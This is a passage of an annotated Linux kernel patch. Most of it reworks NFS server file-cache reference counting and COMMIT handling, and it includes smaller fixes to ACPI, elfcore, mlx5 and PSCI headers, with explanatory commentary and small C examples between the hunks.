++		if (refcount_dec_and_test(&nf->nf_ref))
++			nfsd_file_free(nf);
+ 		nf = NULL;
+ 	}
+ 
+ out_status:
+ 	put_cred(key.cred);
+-	if (open)
+-		trace_nfsd_file_acquire(rqstp, key.inode, may_flags, nf, status);
++	trace_nfsd_file_acquire(rqstp, key.inode, may_flags, nf, status);
+ 	return status;
+ 
+ open_file:
+ 	trace_nfsd_file_alloc(nf);
+ 	nf->nf_mark = nfsd_file_mark_find_or_create(nf, key.inode);
+ 	if (nf->nf_mark) {
+-		if (open) {
++		if (file) {
++			get_file(file);
++			nf->nf_file = file;
++			status = nfs_ok;
++			trace_nfsd_file_opened(nf, status);
++		} else {
+ 			status = nfsd_open_verified(rqstp, fhp, may_flags,
+ 						    &nf->nf_file);
+ 			trace_nfsd_file_open(nf, status);
+-		} else
+-			status = nfs_ok;
++		}
+ 	} else
+ 		status = nfserr_jukebox;
+ 	/*
+ 	 * If construction failed, or we raced with a call to unlink()
+ 	 * then unhash.
+ 	 */
+-	if (status != nfs_ok || key.inode->i_nlink == 0)
+-		if (nfsd_file_unhash(nf))
+-			nfsd_file_put_noref(nf);
++	if (status == nfs_ok && key.inode->i_nlink == 0)
++		status = nfserr_jukebox;
++	if (status != nfs_ok)
++		nfsd_file_unhash(nf);
+ 	clear_bit_unlock(NFSD_FILE_PENDING, &nf->nf_flags);
+ 	smp_mb__after_atomic();
+ 	wake_up_bit(&nf->nf_flags, NFSD_FILE_PENDING);
+ 	goto out;
+ }
+ 
++/**
++ * nfsd_file_acquire_gc - Get a struct nfsd_file with an open file
++ * @rqstp: the RPC transaction being executed
++ * @fhp: the NFS filehandle of the file to be opened
++ * @may_flags: NFSD_MAY_ settings for the file
++ * @pnf: OUT: new or found "struct nfsd_file" object
++ *
++ * The nfsd_file object returned by this API is reference-counted
++ * and garbage-collected. The object is retained for a few
++ * seconds after the final nfsd_file_put() in case the caller
++ * wants to re-use it.
++ *
++ * Returns nfs_ok and sets @pnf on success; otherwise an nfsstat in
++ * network byte order is returned.
++ */
++__be32
++nfsd_file_acquire_gc(struct svc_rqst *rqstp, struct svc_fh *fhp,
++		     unsigned int may_flags, struct nfsd_file **pnf)
++{
++	return nfsd_file_do_acquire(rqstp, fhp, may_flags, NULL, pnf, true);
++}
++
+ /**
+  * nfsd_file_acquire - Get a struct nfsd_file with an open file
+  * @rqstp: the RPC transaction being executed
+@@ -1150,6 +1196,10 @@ open_file:
+  * @may_flags: NFSD_MAY_ settings for the file
+  * @pnf: OUT: new or found "struct nfsd_file" object
+  *
++ * The nfsd_file object returned by this API is reference-counted
++ * but not garbage-collected. The object is unhashed after the
++ * final nfsd_file_put().
++ *
+  * Returns nfs_ok and sets @pnf on success; otherwise an nfsstat in
+  * network byte order is returned.
+  */
+@@ -1157,24 +1207,30 @@ __be32
+ nfsd_file_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 		  unsigned int may_flags, struct nfsd_file **pnf)
+ {
+-	return nfsd_file_do_acquire(rqstp, fhp, may_flags, pnf, true);
++	return nfsd_file_do_acquire(rqstp, fhp, may_flags, NULL, pnf, false);
+ }
+ 
+ /**
+- * nfsd_file_create - Get a struct nfsd_file, do not open
++ * nfsd_file_acquire_opened - Get a struct nfsd_file using existing open file
+  * @rqstp: the RPC transaction being executed
+  * @fhp: the NFS filehandle of the file just created
+  * @may_flags: NFSD_MAY_ settings for the file
++ * @file: cached, already-open file (may be NULL)
+  * @pnf: OUT: new or found "struct nfsd_file" object
+  *
++ * Acquire a nfsd_file object that is not GC'ed. If one doesn't already exist,
++ * and @file is non-NULL, use it to instantiate a new nfsd_file instead of
++ * opening a new one.
++ *
+  * Returns nfs_ok and sets @pnf on success; otherwise an nfsstat in
+  * network byte order is returned.
+  */
+ __be32
+-nfsd_file_create(struct svc_rqst *rqstp, struct svc_fh *fhp,
+-		 unsigned int may_flags, struct nfsd_file **pnf)
++nfsd_file_acquire_opened(struct svc_rqst *rqstp, struct svc_fh *fhp,
++			 unsigned int may_flags, struct file *file,
++			 struct nfsd_file **pnf)
+ {
+-	return nfsd_file_do_acquire(rqstp, fhp, may_flags, pnf, false);
++	return nfsd_file_do_acquire(rqstp, fhp, may_flags, file, pnf, false);
+ }
+ 
+ /*
+@@ -1184,7 +1240,7 @@ nfsd_file_create(struct svc_rqst *rqstp, struct svc_fh *fhp,
+  */
+ int nfsd_file_cache_stats_show(struct seq_file *m, void *v)
+ {
+-	unsigned long releases = 0, pages_flushed = 0, evictions = 0;
++	unsigned long releases = 0, evictions = 0;
+ 	unsigned long hits = 0, acquisitions = 0;
+ 	unsigned int i, count = 0, buckets = 0;
+ 	unsigned long lru = 0, total_age = 0;
+@@ -1212,7 +1268,6 @@ int nfsd_file_cache_stats_show(struct seq_file *m, void *v)
+ 		releases += per_cpu(nfsd_file_releases, i);
+ 		total_age += per_cpu(nfsd_file_total_age, i);
+ 		evictions += per_cpu(nfsd_file_evictions, i);
+-		pages_flushed += per_cpu(nfsd_file_pages_flushed, i);
+ 	}
+ 
+ 	seq_printf(m, "total entries: %u\n", count);
+@@ -1226,6 +1281,5 @@ int nfsd_file_cache_stats_show(struct seq_file *m, void *v)
+ 		seq_printf(m, "mean age (ms): %ld\n", total_age / releases);
+ 	else
+ 		seq_printf(m, "mean age (ms): -\n");
+-	seq_printf(m, "pages flushed: %lu\n", pages_flushed);
+ 	return 0;
+ }
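
The heart of the filecache rework is a new reference-counting scheme: for GC-capable entries the LRU list itself holds one reference, and nfsd_file_put() tries to hand the caller's final reference over to the LRU with refcount_dec_not_one() rather than dropping it. That primitive decrements only while the count is above one, so "I hold the last reference" is detected atomically and without a lock. A runnable C11 model of the primitive (the kernel's refcount_t version additionally saturates and warns on misuse):

    #include <stdatomic.h>
    #include <stdbool.h>
    #include <stdio.h>

    static bool refcount_dec_not_one(atomic_int *r)
    {
        int old = atomic_load(r);

        do {
            if (old == 1)
                return false;       /* caller holds the final reference */
        } while (!atomic_compare_exchange_weak(r, &old, old - 1));
        return true;                /* dropped one of several references */
    }

    int main(void)
    {
        atomic_int ref = 2;

        printf("%d\n", refcount_dec_not_one(&ref));  /* 1: dropped 2 -> 1 */
        printf("%d\n", refcount_dec_not_one(&ref));  /* 0: last ref, kept */
        return 0;
    }

When the hand-off fails, or the entry turns out to have been unhashed in the meantime, the put path falls back to refcount_dec_and_test() and frees the entry directly.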
+diff --git a/fs/nfsd/filecache.h b/fs/nfsd/filecache.h
+index 357832bac736b..41516a4263ea5 100644
+--- a/fs/nfsd/filecache.h
++++ b/fs/nfsd/filecache.h
+@@ -38,6 +38,7 @@ struct nfsd_file {
+ #define NFSD_FILE_HASHED	(0)
+ #define NFSD_FILE_PENDING	(1)
+ #define NFSD_FILE_REFERENCED	(2)
++#define NFSD_FILE_GC		(3)
+ 	unsigned long		nf_flags;
+ 	struct inode		*nf_inode;	/* don't deref */
+ 	refcount_t		nf_ref;
+@@ -52,13 +53,15 @@ void nfsd_file_cache_shutdown(void);
+ int nfsd_file_cache_start_net(struct net *net);
+ void nfsd_file_cache_shutdown_net(struct net *net);
+ void nfsd_file_put(struct nfsd_file *nf);
+-void nfsd_file_close(struct nfsd_file *nf);
+ struct nfsd_file *nfsd_file_get(struct nfsd_file *nf);
+ void nfsd_file_close_inode_sync(struct inode *inode);
+ bool nfsd_file_is_cached(struct inode *inode);
+-__be32 nfsd_file_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
++__be32 nfsd_file_acquire_gc(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 		  unsigned int may_flags, struct nfsd_file **nfp);
+-__be32 nfsd_file_create(struct svc_rqst *rqstp, struct svc_fh *fhp,
++__be32 nfsd_file_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 		  unsigned int may_flags, struct nfsd_file **nfp);
++__be32 nfsd_file_acquire_opened(struct svc_rqst *rqstp, struct svc_fh *fhp,
++		  unsigned int may_flags, struct file *file,
++		  struct nfsd_file **nfp);
+ int nfsd_file_cache_stats_show(struct seq_file *m, void *v);
+ #endif /* _FS_NFSD_FILECACHE_H */
+diff --git a/fs/nfsd/nfs3proc.c b/fs/nfsd/nfs3proc.c
+index 923d9a80df92c..d01b29aba6623 100644
+--- a/fs/nfsd/nfs3proc.c
++++ b/fs/nfsd/nfs3proc.c
+@@ -13,6 +13,7 @@
+ #include "cache.h"
+ #include "xdr3.h"
+ #include "vfs.h"
++#include "filecache.h"
+ 
+ #define NFSDDBG_FACILITY		NFSDDBG_PROC
+ 
+@@ -763,6 +764,7 @@ nfsd3_proc_commit(struct svc_rqst *rqstp)
+ {
+ 	struct nfsd3_commitargs *argp = rqstp->rq_argp;
+ 	struct nfsd3_commitres *resp = rqstp->rq_resp;
++	struct nfsd_file *nf;
+ 
+ 	dprintk("nfsd: COMMIT(3)   %s %u@%Lu\n",
+ 				SVCFH_fmt(&argp->fh),
+@@ -770,8 +772,14 @@ nfsd3_proc_commit(struct svc_rqst *rqstp)
+ 				(unsigned long long) argp->offset);
+ 
+ 	fh_copy(&resp->fh, &argp->fh);
+-	resp->status = nfsd_commit(rqstp, &resp->fh, argp->offset,
++	resp->status = nfsd_file_acquire_gc(rqstp, &resp->fh, NFSD_MAY_WRITE |
++					    NFSD_MAY_NOT_BREAK_LEASE, &nf);
++	if (resp->status)
++		goto out;
++	resp->status = nfsd_commit(rqstp, &resp->fh, nf, argp->offset,
+ 				   argp->count, resp->verf);
++	nfsd_file_put(nf);
++out:
+ 	return rpc_success;
+ }
+ 
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index c7329523a10f1..30a08ec31a703 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -731,10 +731,19 @@ nfsd4_commit(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	     union nfsd4_op_u *u)
+ {
+ 	struct nfsd4_commit *commit = &u->commit;
++	struct nfsd_file *nf;
++	__be32 status;
+ 
+-	return nfsd_commit(rqstp, &cstate->current_fh, commit->co_offset,
++	status = nfsd_file_acquire(rqstp, &cstate->current_fh, NFSD_MAY_WRITE |
++				   NFSD_MAY_NOT_BREAK_LEASE, &nf);
++	if (status != nfs_ok)
++		return status;
++
++	status = nfsd_commit(rqstp, &cstate->current_fh, nf, commit->co_offset,
+ 			     commit->co_count,
+ 			     (__be32 *)commit->co_verf.data);
++	nfsd_file_put(nf);
++	return status;
+ }
+ 
+ static __be32
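
With nfsd_commit() no longer opening the file itself, each COMMIT implementation brackets the call with its own acquire/put, and the two protocol versions deliberately pick different cache behaviour: NFSv3 uses nfsd_file_acquire_gc(), since v3 clients send WRITE/COMMIT with no open state and benefit from the entry lingering briefly, while NFSv4 uses plain nfsd_file_acquire(). The caller shape, condensed from the patch:

    status = nfsd_file_acquire_gc(rqstp, fhp,
                                  NFSD_MAY_WRITE | NFSD_MAY_NOT_BREAK_LEASE, &nf);
    if (status != nfs_ok)
        return status;
    status = nfsd_commit(rqstp, fhp, nf, offset, count, verf);
    nfsd_file_put(nf);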
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index 52b5552d0d70e..2247d107da90b 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -842,9 +842,9 @@ static void __nfs4_file_put_access(struct nfs4_file *fp, int oflag)
+ 			swap(f2, fp->fi_fds[O_RDWR]);
+ 		spin_unlock(&fp->fi_lock);
+ 		if (f1)
+-			nfsd_file_close(f1);
++			nfsd_file_put(f1);
+ 		if (f2)
+-			nfsd_file_close(f2);
++			nfsd_file_put(f2);
+ 	}
+ }
+ 
+@@ -5211,18 +5211,10 @@ static __be32 nfs4_get_vfs_file(struct svc_rqst *rqstp, struct nfs4_file *fp,
+ 	if (!fp->fi_fds[oflag]) {
+ 		spin_unlock(&fp->fi_lock);
+ 
+-		if (!open->op_filp) {
+-			status = nfsd_file_acquire(rqstp, cur_fh, access, &nf);
+-			if (status != nfs_ok)
+-				goto out_put_access;
+-		} else {
+-			status = nfsd_file_create(rqstp, cur_fh, access, &nf);
+-			if (status != nfs_ok)
+-				goto out_put_access;
+-			nf->nf_file = open->op_filp;
+-			open->op_filp = NULL;
+-			trace_nfsd_file_create(rqstp, access, nf);
+-		}
++		status = nfsd_file_acquire_opened(rqstp, cur_fh, access,
++						  open->op_filp, &nf);
++		if (status != nfs_ok)
++			goto out_put_access;
+ 
+ 		spin_lock(&fp->fi_lock);
+ 		if (!fp->fi_fds[oflag]) {
+diff --git a/fs/nfsd/trace.h b/fs/nfsd/trace.h
+index d4b6839bb459a..4eb4e1039c7f4 100644
+--- a/fs/nfsd/trace.h
++++ b/fs/nfsd/trace.h
+@@ -817,7 +817,8 @@ DEFINE_CLID_EVENT(confirmed_r);
+ 	__print_flags(val, "|",						\
+ 		{ 1 << NFSD_FILE_HASHED,	"HASHED" },		\
+ 		{ 1 << NFSD_FILE_PENDING,	"PENDING" },		\
+-		{ 1 << NFSD_FILE_REFERENCED,	"REFERENCED"})
++		{ 1 << NFSD_FILE_REFERENCED,	"REFERENCED" },		\
++		{ 1 << NFSD_FILE_GC,		"GC" })
+ 
+ DECLARE_EVENT_CLASS(nfsd_file_class,
+ 	TP_PROTO(struct nfsd_file *nf),
+@@ -849,10 +850,11 @@ DEFINE_EVENT(nfsd_file_class, name, \
+ 	TP_PROTO(struct nfsd_file *nf), \
+ 	TP_ARGS(nf))
+ 
+-DEFINE_NFSD_FILE_EVENT(nfsd_file_put_final);
++DEFINE_NFSD_FILE_EVENT(nfsd_file_free);
+ DEFINE_NFSD_FILE_EVENT(nfsd_file_unhash);
+ DEFINE_NFSD_FILE_EVENT(nfsd_file_put);
+-DEFINE_NFSD_FILE_EVENT(nfsd_file_unhash_and_dispose);
++DEFINE_NFSD_FILE_EVENT(nfsd_file_closing);
++DEFINE_NFSD_FILE_EVENT(nfsd_file_unhash_and_queue);
+ 
+ TRACE_EVENT(nfsd_file_alloc,
+ 	TP_PROTO(
+@@ -920,43 +922,6 @@ TRACE_EVENT(nfsd_file_acquire,
+ 	)
+ );
+ 
+-TRACE_EVENT(nfsd_file_create,
+-	TP_PROTO(
+-		const struct svc_rqst *rqstp,
+-		unsigned int may_flags,
+-		const struct nfsd_file *nf
+-	),
+-
+-	TP_ARGS(rqstp, may_flags, nf),
+-
+-	TP_STRUCT__entry(
+-		__field(const void *, nf_inode)
+-		__field(const void *, nf_file)
+-		__field(unsigned long, may_flags)
+-		__field(unsigned long, nf_flags)
+-		__field(unsigned long, nf_may)
+-		__field(unsigned int, nf_ref)
+-		__field(u32, xid)
+-	),
+-
+-	TP_fast_assign(
+-		__entry->nf_inode = nf->nf_inode;
+-		__entry->nf_file = nf->nf_file;
+-		__entry->may_flags = may_flags;
+-		__entry->nf_flags = nf->nf_flags;
+-		__entry->nf_may = nf->nf_may;
+-		__entry->nf_ref = refcount_read(&nf->nf_ref);
+-		__entry->xid = be32_to_cpu(rqstp->rq_xid);
+-	),
+-
+-	TP_printk("xid=0x%x inode=%p may_flags=%s ref=%u nf_flags=%s nf_may=%s nf_file=%p",
+-		__entry->xid, __entry->nf_inode,
+-		show_nfsd_may_flags(__entry->may_flags),
+-		__entry->nf_ref, show_nf_flags(__entry->nf_flags),
+-		show_nfsd_may_flags(__entry->nf_may), __entry->nf_file
+-	)
+-);
+-
+ TRACE_EVENT(nfsd_file_insert_err,
+ 	TP_PROTO(
+ 		const struct svc_rqst *rqstp,
+@@ -1018,8 +983,8 @@ TRACE_EVENT(nfsd_file_cons_err,
+ 	)
+ );
+ 
+-TRACE_EVENT(nfsd_file_open,
+-	TP_PROTO(struct nfsd_file *nf, __be32 status),
++DECLARE_EVENT_CLASS(nfsd_file_open_class,
++	TP_PROTO(const struct nfsd_file *nf, __be32 status),
+ 	TP_ARGS(nf, status),
+ 	TP_STRUCT__entry(
+ 		__field(void *, nf_inode)	/* cannot be dereferenced */
+@@ -1043,34 +1008,16 @@ TRACE_EVENT(nfsd_file_open,
+ 		__entry->nf_file)
+ )
+ 
+-DECLARE_EVENT_CLASS(nfsd_file_search_class,
+-	TP_PROTO(
+-		const struct inode *inode,
+-		unsigned int count
+-	),
+-	TP_ARGS(inode, count),
+-	TP_STRUCT__entry(
+-		__field(const struct inode *, inode)
+-		__field(unsigned int, count)
+-	),
+-	TP_fast_assign(
+-		__entry->inode = inode;
+-		__entry->count = count;
+-	),
+-	TP_printk("inode=%p count=%u",
+-		__entry->inode, __entry->count)
+-);
+-
+-#define DEFINE_NFSD_FILE_SEARCH_EVENT(name)				\
+-DEFINE_EVENT(nfsd_file_search_class, name,				\
++#define DEFINE_NFSD_FILE_OPEN_EVENT(name)					\
++DEFINE_EVENT(nfsd_file_open_class, name,					\
+ 	TP_PROTO(							\
+-		const struct inode *inode,				\
+-		unsigned int count					\
++		const struct nfsd_file *nf,				\
++		__be32 status						\
+ 	),								\
+-	TP_ARGS(inode, count))
++	TP_ARGS(nf, status))
+ 
+-DEFINE_NFSD_FILE_SEARCH_EVENT(nfsd_file_close_inode_sync);
+-DEFINE_NFSD_FILE_SEARCH_EVENT(nfsd_file_close_inode);
++DEFINE_NFSD_FILE_OPEN_EVENT(nfsd_file_open);
++DEFINE_NFSD_FILE_OPEN_EVENT(nfsd_file_opened);
+ 
+ TRACE_EVENT(nfsd_file_is_cached,
+ 	TP_PROTO(
+@@ -1149,7 +1096,6 @@ DEFINE_NFSD_FILE_GC_EVENT(nfsd_file_lru_del_disposed);
+ DEFINE_NFSD_FILE_GC_EVENT(nfsd_file_gc_in_use);
+ DEFINE_NFSD_FILE_GC_EVENT(nfsd_file_gc_writeback);
+ DEFINE_NFSD_FILE_GC_EVENT(nfsd_file_gc_referenced);
+-DEFINE_NFSD_FILE_GC_EVENT(nfsd_file_gc_hashed);
+ DEFINE_NFSD_FILE_GC_EVENT(nfsd_file_gc_disposed);
+ 
+ DECLARE_EVENT_CLASS(nfsd_file_lruwalk_class,
+@@ -1181,6 +1127,53 @@ DEFINE_EVENT(nfsd_file_lruwalk_class, name,				\
+ DEFINE_NFSD_FILE_LRUWALK_EVENT(nfsd_file_gc_removed);
+ DEFINE_NFSD_FILE_LRUWALK_EVENT(nfsd_file_shrinker_removed);
+ 
++TRACE_EVENT(nfsd_file_close,
++	TP_PROTO(
++		const struct inode *inode
++	),
++	TP_ARGS(inode),
++	TP_STRUCT__entry(
++		__field(const void *, inode)
++	),
++	TP_fast_assign(
++		__entry->inode = inode;
++	),
++	TP_printk("inode=%p",
++		__entry->inode
++	)
++);
++
++TRACE_EVENT(nfsd_file_fsync,
++	TP_PROTO(
++		const struct nfsd_file *nf,
++		int ret
++	),
++	TP_ARGS(nf, ret),
++	TP_STRUCT__entry(
++		__field(void *, nf_inode)
++		__field(int, nf_ref)
++		__field(int, ret)
++		__field(unsigned long, nf_flags)
++		__field(unsigned char, nf_may)
++		__field(struct file *, nf_file)
++	),
++	TP_fast_assign(
++		__entry->nf_inode = nf->nf_inode;
++		__entry->nf_ref = refcount_read(&nf->nf_ref);
++		__entry->ret = ret;
++		__entry->nf_flags = nf->nf_flags;
++		__entry->nf_may = nf->nf_may;
++		__entry->nf_file = nf->nf_file;
++	),
++	TP_printk("inode=%p ref=%d flags=%s may=%s nf_file=%p ret=%d",
++		__entry->nf_inode,
++		__entry->nf_ref,
++		show_nf_flags(__entry->nf_flags),
++		show_nfsd_may_flags(__entry->nf_may),
++		__entry->nf_file, __entry->ret
++	)
++);
++
+ #include "cache.h"
+ 
+ TRACE_DEFINE_ENUM(RC_DROPIT);
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 849a720ab43f0..2934ab1d9862b 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -1085,7 +1085,7 @@ __be32 nfsd_read(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 	__be32 err;
+ 
+ 	trace_nfsd_read_start(rqstp, fhp, offset, *count);
+-	err = nfsd_file_acquire(rqstp, fhp, NFSD_MAY_READ, &nf);
++	err = nfsd_file_acquire_gc(rqstp, fhp, NFSD_MAY_READ, &nf);
+ 	if (err)
+ 		return err;
+ 
+@@ -1117,7 +1117,7 @@ nfsd_write(struct svc_rqst *rqstp, struct svc_fh *fhp, loff_t offset,
+ 
+ 	trace_nfsd_write_start(rqstp, fhp, offset, *cnt);
+ 
+-	err = nfsd_file_acquire(rqstp, fhp, NFSD_MAY_WRITE, &nf);
++	err = nfsd_file_acquire_gc(rqstp, fhp, NFSD_MAY_WRITE, &nf);
+ 	if (err)
+ 		goto out;
+ 
+@@ -1133,6 +1133,7 @@ out:
+  * nfsd_commit - Commit pending writes to stable storage
+  * @rqstp: RPC request being processed
+  * @fhp: NFS filehandle
++ * @nf: target file
+  * @offset: raw offset from beginning of file
+  * @count: raw count of bytes to sync
+  * @verf: filled in with the server's current write verifier
+@@ -1149,19 +1150,13 @@ out:
+  *   An nfsstat value in network byte order.
+  */
+ __be32
+-nfsd_commit(struct svc_rqst *rqstp, struct svc_fh *fhp, u64 offset,
+-	    u32 count, __be32 *verf)
++nfsd_commit(struct svc_rqst *rqstp, struct svc_fh *fhp, struct nfsd_file *nf,
++	    u64 offset, u32 count, __be32 *verf)
+ {
++	__be32			err = nfs_ok;
+ 	u64			maxbytes;
+ 	loff_t			start, end;
+ 	struct nfsd_net		*nn;
+-	struct nfsd_file	*nf;
+-	__be32			err;
+-
+-	err = nfsd_file_acquire(rqstp, fhp,
+-			NFSD_MAY_WRITE|NFSD_MAY_NOT_BREAK_LEASE, &nf);
+-	if (err)
+-		goto out;
+ 
+ 	/*
+ 	 * Convert the client-provided (offset, count) range to a
+@@ -1202,8 +1197,6 @@ nfsd_commit(struct svc_rqst *rqstp, struct svc_fh *fhp, u64 offset,
+ 	} else
+ 		nfsd_copy_write_verifier(verf, nn);
+ 
+-	nfsd_file_put(nf);
+-out:
+ 	return err;
+ }
+ 
+diff --git a/fs/nfsd/vfs.h b/fs/nfsd/vfs.h
+index 120521bc7b247..9744b041105b5 100644
+--- a/fs/nfsd/vfs.h
++++ b/fs/nfsd/vfs.h
+@@ -88,7 +88,8 @@ __be32		nfsd_access(struct svc_rqst *, struct svc_fh *, u32 *, u32 *);
+ __be32		nfsd_create_setattr(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 				struct svc_fh *resfhp, struct nfsd_attrs *iap);
+ __be32		nfsd_commit(struct svc_rqst *rqst, struct svc_fh *fhp,
+-				u64 offset, u32 count, __be32 *verf);
++				struct nfsd_file *nf, u64 offset, u32 count,
++				__be32 *verf);
+ #ifdef CONFIG_NFSD_V4
+ __be32		nfsd_getxattr(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 			    char *name, void **bufp, int *lenp);
+diff --git a/include/acpi/acpi_bus.h b/include/acpi/acpi_bus.h
+index c09d72986968a..ab2d6266038a0 100644
+--- a/include/acpi/acpi_bus.h
++++ b/include/acpi/acpi_bus.h
+@@ -230,7 +230,8 @@ struct acpi_pnp_type {
+ 	u32 hardware_id:1;
+ 	u32 bus_address:1;
+ 	u32 platform_id:1;
+-	u32 reserved:29;
++	u32 backlight:1;
++	u32 reserved:28;
+ };
+ 
+ struct acpi_device_pnp {
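
The acpi_pnp_type change carves the new backlight flag out of the reserved bits, shrinking reserved from 29 to 28 so the field widths still total exactly 32. A compilable check of that invariant (field names mirror the header; the assertion is an illustration, not part of the patch, and the struct size is in principle ABI-dependent):

    #include <assert.h>
    #include <stdint.h>

    struct acpi_pnp_type {
        unsigned int hardware_id:1;
        unsigned int bus_address:1;
        unsigned int platform_id:1;
        unsigned int backlight:1;
        unsigned int reserved:28;   /* 1 + 1 + 1 + 1 + 28 == 32 */
    };

    static_assert(sizeof(struct acpi_pnp_type) == sizeof(uint32_t),
                  "flag widths must keep the bitfield within one 32-bit word");

    int main(void) { return 0; }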
+diff --git a/include/linux/elfcore.h b/include/linux/elfcore.h
+index 346a8b56cdc83..79e26b18bf0ef 100644
+--- a/include/linux/elfcore.h
++++ b/include/linux/elfcore.h
+@@ -114,14 +114,14 @@ static inline int elf_core_copy_task_fpregs(struct task_struct *t, struct pt_reg
+  * Dumping its extra ELF program headers includes all the other information
+  * a debugger needs to easily find how the gate DSO was being used.
+  */
+-extern Elf_Half elf_core_extra_phdrs(void);
++extern Elf_Half elf_core_extra_phdrs(struct coredump_params *cprm);
+ extern int
+ elf_core_write_extra_phdrs(struct coredump_params *cprm, loff_t offset);
+ extern int
+ elf_core_write_extra_data(struct coredump_params *cprm);
+-extern size_t elf_core_extra_data_size(void);
++extern size_t elf_core_extra_data_size(struct coredump_params *cprm);
+ #else
+-static inline Elf_Half elf_core_extra_phdrs(void)
++static inline Elf_Half elf_core_extra_phdrs(struct coredump_params *cprm)
+ {
+ 	return 0;
+ }
+@@ -136,7 +136,7 @@ static inline int elf_core_write_extra_data(struct coredump_params *cprm)
+ 	return 1;
+ }
+ 
+-static inline size_t elf_core_extra_data_size(void)
++static inline size_t elf_core_extra_data_size(struct coredump_params *cprm)
+ {
+ 	return 0;
+ }
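
The elfcore.h hunk shows the standard way to thread a new parameter through an optional kernel interface: the real declarations and the !CONFIG_ELF_CORE static-inline stubs gain the struct coredump_params * argument in lockstep, so callers can pass cprm unconditionally and configurations without the feature still compile. A skeletal version of the pattern (hypothetical feature and function names):

    /* example_core.h */
    #include <stddef.h>

    struct coredump_params;     /* opaque to this header */

    #ifdef CONFIG_EXAMPLE_CORE
    extern size_t example_extra_size(struct coredump_params *cprm);
    #else
    static inline size_t example_extra_size(struct coredump_params *cprm)
    {
        return 0;               /* stub keeps call sites unconditional */
    }
    #endif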
+diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h
+index 06cbad166225a..ad55470a9fb97 100644
+--- a/include/linux/mlx5/driver.h
++++ b/include/linux/mlx5/driver.h
+@@ -315,7 +315,7 @@ struct mlx5_cmd {
+ 	struct mlx5_cmd_debug dbg;
+ 	struct cmd_msg_cache cache[MLX5_NUM_COMMAND_CACHES];
+ 	int checksum_disabled;
+-	struct mlx5_cmd_stats *stats;
++	struct mlx5_cmd_stats stats[MLX5_CMD_OP_MAX];
+ };
+ 
+ struct mlx5_cmd_mailbox {
+diff --git a/include/linux/mtd/spi-nor.h b/include/linux/mtd/spi-nor.h
+index 42218a1164f6d..f92bf7f7a7543 100644
+--- a/include/linux/mtd/spi-nor.h
++++ b/include/linux/mtd/spi-nor.h
+@@ -7,7 +7,6 @@
+ #define __LINUX_MTD_SPI_NOR_H
+ 
+ #include <linux/bitops.h>
+-#include <linux/mtd/cfi.h>
+ #include <linux/mtd/mtd.h>
+ #include <linux/spi/spi-mem.h>
+ 
+diff --git a/include/linux/tpm_eventlog.h b/include/linux/tpm_eventlog.h
+index 20c0ff54b7a0d..7d68a5cc58816 100644
+--- a/include/linux/tpm_eventlog.h
++++ b/include/linux/tpm_eventlog.h
+@@ -198,8 +198,8 @@ static __always_inline int __calc_tpm2_event_size(struct tcg_pcr_event2_head *ev
+ 	 * The loop below will unmap these fields if the log is larger than
+ 	 * one page, so save them here for reference:
+ 	 */
+-	count = READ_ONCE(event->count);
+-	event_type = READ_ONCE(event->event_type);
++	count = event->count;
++	event_type = event->event_type;
+ 
+ 	/* Verify that it's the log header */
+ 	if (event_header->pcr_idx != 0 ||
+diff --git a/include/uapi/linux/psci.h b/include/uapi/linux/psci.h
+index 3511095c2702b..42a40ad3fb622 100644
+--- a/include/uapi/linux/psci.h
++++ b/include/uapi/linux/psci.h
+@@ -58,7 +58,7 @@
+ 
+ #define PSCI_1_1_FN_SYSTEM_RESET2		PSCI_0_2_FN(18)
+ #define PSCI_1_1_FN_MEM_PROTECT			PSCI_0_2_FN(19)
+-#define PSCI_1_1_FN_MEM_PROTECT_CHECK_RANGE	PSCI_0_2_FN(19)
++#define PSCI_1_1_FN_MEM_PROTECT_CHECK_RANGE	PSCI_0_2_FN(20)
+ 
+ #define PSCI_1_0_FN64_CPU_DEFAULT_SUSPEND	PSCI_0_2_FN64(12)
+ #define PSCI_1_0_FN64_NODE_HW_STATE		PSCI_0_2_FN64(13)
+@@ -67,7 +67,7 @@
+ #define PSCI_1_0_FN64_STAT_COUNT		PSCI_0_2_FN64(17)
+ 
+ #define PSCI_1_1_FN64_SYSTEM_RESET2		PSCI_0_2_FN64(18)
+-#define PSCI_1_1_FN64_MEM_PROTECT_CHECK_RANGE	PSCI_0_2_FN64(19)
++#define PSCI_1_1_FN64_MEM_PROTECT_CHECK_RANGE	PSCI_0_2_FN64(20)
+ 
+ /* PSCI v0.2 power state encoding for CPU_SUSPEND function */
+ #define PSCI_0_2_POWER_STATE_ID_MASK		0xffff
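
The PSCI fix corrects a copy-paste error: MEM_PROTECT_CHECK_RANGE had been assigned the same SMCCC function number as MEM_PROTECT (19), making the two calls indistinguishable on the wire; per PSCI 1.1 the range check is function 20. A small compile-time check of the repaired IDs (base value and macro mirrored from the same uapi header):

    #include <assert.h>

    #define PSCI_0_2_FN_BASE    0x84000000U
    #define PSCI_0_2_FN(n)      (PSCI_0_2_FN_BASE + (n))

    #define PSCI_1_1_FN_MEM_PROTECT             PSCI_0_2_FN(19)
    #define PSCI_1_1_FN_MEM_PROTECT_CHECK_RANGE PSCI_0_2_FN(20)

    static_assert(PSCI_1_1_FN_MEM_PROTECT !=
                  PSCI_1_1_FN_MEM_PROTECT_CHECK_RANGE,
                  "each PSCI call needs a distinct SMCCC function ID");

    int main(void) { return 0; }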
+diff --git a/io_uring/fdinfo.c b/io_uring/fdinfo.c
+index 2e04850a657b0..882bd56b01ed0 100644
+--- a/io_uring/fdinfo.c
++++ b/io_uring/fdinfo.c
